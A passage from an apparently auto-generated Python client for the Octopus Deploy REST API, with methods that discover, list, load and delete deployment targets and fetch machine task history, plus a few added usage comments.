query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MachineResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_spaces(self, base_space_id, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_spaces # noqa: E501
Interrogate a machine for communication details so that it may be added to the installation. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_spaces(base_space_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:return: MachineResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_spaces_with_http_info(base_space_id, **kwargs) # noqa: E501
else:
(data) = self.custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_spaces_with_http_info(base_space_id, **kwargs) # noqa: E501
return data
def custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_spaces_with_http_info(self, base_space_id, **kwargs): # noqa: E501
"""custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_spaces # noqa: E501
Interrogate a machine for communication details so that it may be added to the installation. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_spaces_with_http_info(base_space_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:return: MachineResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['base_space_id', 'host', 'port'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_spaces" % key
)
params[key] = val
del params['kwargs']
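# (Pattern note, added for readability: `locals()` snapshots the named
# arguments, the loop above merges each validated **kwargs entry into that
# dict, and the raw 'kwargs' key is then dropped so `params` holds one flat
# mapping of every accepted parameter. The same idiom repeats in every
# generated *_with_http_info method below.)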
# verify the required parameter 'base_space_id' is set
if ('base_space_id' not in params or
params['base_space_id'] is None):
raise ValueError("Missing the required parameter `base_space_id` when calling `custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_spaces`") # noqa: E501
collection_formats = {}
path_params = {}
if 'base_space_id' in params:
path_params['baseSpaceId'] = params['base_space_id'] # noqa: E501
query_params = []
if 'host' in params:
query_params.append(('host', params['host']))
if 'port' in params:
query_params.append(('port', params['port']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/{baseSpaceId}/machines/discover', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MachineResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
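# --- Usage sketch (illustrative only, not part of the generated client;
# assumes `api` is an instance of this API class wired to a configured
# ApiClient, as in the docstring examples; the space ID and host/port
# values are hypothetical) ---
#
#   machine = api.custom_action_response_descriptor_octopus_server_web_api_actions_discover_deployment_target_responder_spaces(
#       'Spaces-1', host='tentacle.example.com', port='10933')
#
# With async_req=True the call returns a thread instead; thread.get()
# yields the MachineResource.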
def custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder(self, **kwargs): # noqa: E501
"""custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder # noqa: E501
Lists all of the registered machines in the supplied Octopus Deploy Space, from all environments. The results will be sorted alphabetically by name. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_with_http_info(**kwargs) # noqa: E501
return data
def custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_with_http_info(self, **kwargs): # noqa: E501
"""custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder # noqa: E501
Lists all of the registered machines in the supplied Octopus Deploy Space, from all environments. The results will be sorted alphabetically by name. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/machines', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_spaces(self, base_space_id, **kwargs): # noqa: E501
"""custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_spaces # noqa: E501
Lists all of the registered machines in the supplied Octopus Deploy Space, from all environments. The results will be sorted alphabetically by name. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_spaces(base_space_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_spaces_with_http_info(base_space_id, **kwargs) # noqa: E501
else:
(data) = self.custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_spaces_with_http_info(base_space_id, **kwargs) # noqa: E501
return data
def custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_spaces_with_http_info(self, base_space_id, **kwargs): # noqa: E501
"""custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_spaces # noqa: E501
Lists all of the registered machines in the supplied Octopus Deploy Space, from all environments. The results will be sorted alphabetically by name. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_spaces_with_http_info(base_space_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['base_space_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_spaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'base_space_id' is set
if ('base_space_id' not in params or
params['base_space_id'] is None):
raise ValueError("Missing the required parameter `base_space_id` when calling `custom_query_response_descriptor_octopus_server_web_api_actions_list_deployment_target_responder_spaces`") # noqa: E501
collection_formats = {}
path_params = {}
if 'base_space_id' in params:
path_params['baseSpaceId'] = params['base_space_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/{baseSpaceId}/machines', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder(self, id, **kwargs): # noqa: E501
"""custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder # noqa: E501
Get the history of related tasks for a machine. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: ID of the machine (required)
:return: ResourceCollectionTaskResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_with_http_info(id, **kwargs) # noqa: E501
return data
def custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_with_http_info(self, id, **kwargs): # noqa: E501
"""custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder # noqa: E501
Get the history of related tasks for a machine. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: ID of the machine (required)
:return: ResourceCollectionTaskResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/machines/{id}/tasks', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResourceCollectionTaskResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces(self, base_space_id, id, **kwargs): # noqa: E501
"""custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces # noqa: E501
Get the history of related tasks for a machine. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces(base_space_id, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param str id: ID of the machine (required)
:return: ResourceCollectionTaskResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces_with_http_info(base_space_id, id, **kwargs) # noqa: E501
else:
(data) = self.custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces_with_http_info(base_space_id, id, **kwargs) # noqa: E501
return data
def custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces_with_http_info(self, base_space_id, id, **kwargs): # noqa: E501
"""custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces # noqa: E501
Get the history of related tasks for a machine. NOTE: This definition is not complete. We will be adding more detail in future releases of Octopus. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces_with_http_info(base_space_id, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param str id: ID of the machine (required)
:return: ResourceCollectionTaskResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['base_space_id', 'id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'base_space_id' is set
if ('base_space_id' not in params or
params['base_space_id'] is None):
raise ValueError("Missing the required parameter `base_space_id` when calling `custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces`") # noqa: E501
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces`") # noqa: E501
collection_formats = {}
path_params = {}
if 'base_space_id' in params:
path_params['baseSpaceId'] = params['base_space_id'] # noqa: E501
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/{baseSpaceId}/machines/{id}/tasks', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResourceCollectionTaskResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
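# Usage sketch (illustrative; `api`, the space ID and machine ID are
# hypothetical):
#
#   history = api.custom_query_response_descriptor_octopus_server_web_api_actions_machine_task_responder_spaces(
#       'Spaces-1', 'Machines-42')
#
# `history` is a ResourceCollectionTaskResource holding the machine's
# related-task history.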
def delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource(self, id, **kwargs): # noqa: E501
"""Delete a DeploymentTargetResource by ID # noqa: E501
Deletes an existing machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: ID of the DeploymentTargetResource to delete (required)
:return: TaskResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete a DeploymentTargetResource by ID # noqa: E501
Deletes an existing machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: ID of the DeploymentTargetResource to delete (required)
:return: TaskResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/machines/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TaskResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(self, base_space_id, id, **kwargs): # noqa: E501
"""Delete a DeploymentTargetResource by ID # noqa: E501
Deletes an existing machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(base_space_id, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param str id: ID of the DeploymentTargetResource to delete (required)
:return: TaskResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, id, **kwargs) # noqa: E501
else:
(data) = self.delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, id, **kwargs) # noqa: E501
return data
def delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(self, base_space_id, id, **kwargs): # noqa: E501
"""Delete a DeploymentTargetResource by ID # noqa: E501
Deletes an existing machine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:param str id: ID of the DeploymentTargetResource to delete (required)
:return: TaskResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['base_space_id', 'id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'base_space_id' is set
if ('base_space_id' not in params or
params['base_space_id'] is None):
raise ValueError("Missing the required parameter `base_space_id` when calling `delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces`") # noqa: E501
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces`") # noqa: E501
collection_formats = {}
path_params = {}
if 'base_space_id' in params:
path_params['baseSpaceId'] = params['base_space_id'] # noqa: E501
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/{baseSpaceId}/machines/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TaskResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
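# Usage sketch (illustrative; IDs hypothetical). As the method name
# suggests, the server performs the delete in the background and the call
# returns a TaskResource describing that server-side task:
#
#   task = api.delete_on_background_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(
#       'Spaces-1', 'Machines-42')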
def list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource(self, **kwargs): # noqa: E501
"""Get a list of DeploymentTargetResources # noqa: E501
Lists all of the deployment targets in the supplied Octopus Deploy Space. The results will be sorted alphabetically by name. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[DeploymentTargetResource]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(**kwargs) # noqa: E501
return data
def list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(self, **kwargs): # noqa: E501
"""Get a list of DeploymentTargetResources # noqa: E501
Lists all of the deployment targets in the supplied Octopus Deploy Space. The results will be sorted alphabetically by name. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[DeploymentTargetResource]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/machines/all', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[DeploymentTargetResource]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(self, base_space_id, **kwargs): # noqa: E501
"""Get a list of DeploymentTargetResources # noqa: E501
Lists all of the deployment targets in the supplied Octopus Deploy Space. The results will be sorted alphabetically by name. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(base_space_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:return: list[DeploymentTargetResource]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, **kwargs) # noqa: E501
else:
(data) = self.list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, **kwargs) # noqa: E501
return data
def list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(self, base_space_id, **kwargs): # noqa: E501
"""Get a list of DeploymentTargetResources # noqa: E501
Lists all of the deployment targets in the supplied Octopus Deploy Space. The results will be sorted alphabetically by name. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces_with_http_info(base_space_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str base_space_id: ID of the space (required)
:return: list[DeploymentTargetResource]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['base_space_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'base_space_id' is set
if ('base_space_id' not in params or
params['base_space_id'] is None):
raise ValueError("Missing the required parameter `base_space_id` when calling `list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces`") # noqa: E501
collection_formats = {}
path_params = {}
if 'base_space_id' in params:
path_params['baseSpaceId'] = params['base_space_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'APIKeyQuery', 'NugetApiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/api/{baseSpaceId}/machines/all', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[DeploymentTargetResource]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
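# Usage sketch (illustrative; the space ID is hypothetical):
#
#   targets = api.list_all_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource_spaces(
#       'Spaces-1')
#
# `targets` is a list[DeploymentTargetResource], sorted alphabetically by
# name per the endpoint description above.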
def load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource(self, id, **kwargs): # noqa: E501
"""Get a DeploymentTargetResource by ID # noqa: E501
Gets a single machine by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.load_response_descriptor_machines_deployment_targets_deployment_target_deployment_target_resource(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: ID of the DeploymentTargetResource to load (required)
:return: DeploymentTargetResource
If the method is called asynchronously,
returns the request thread.
"""
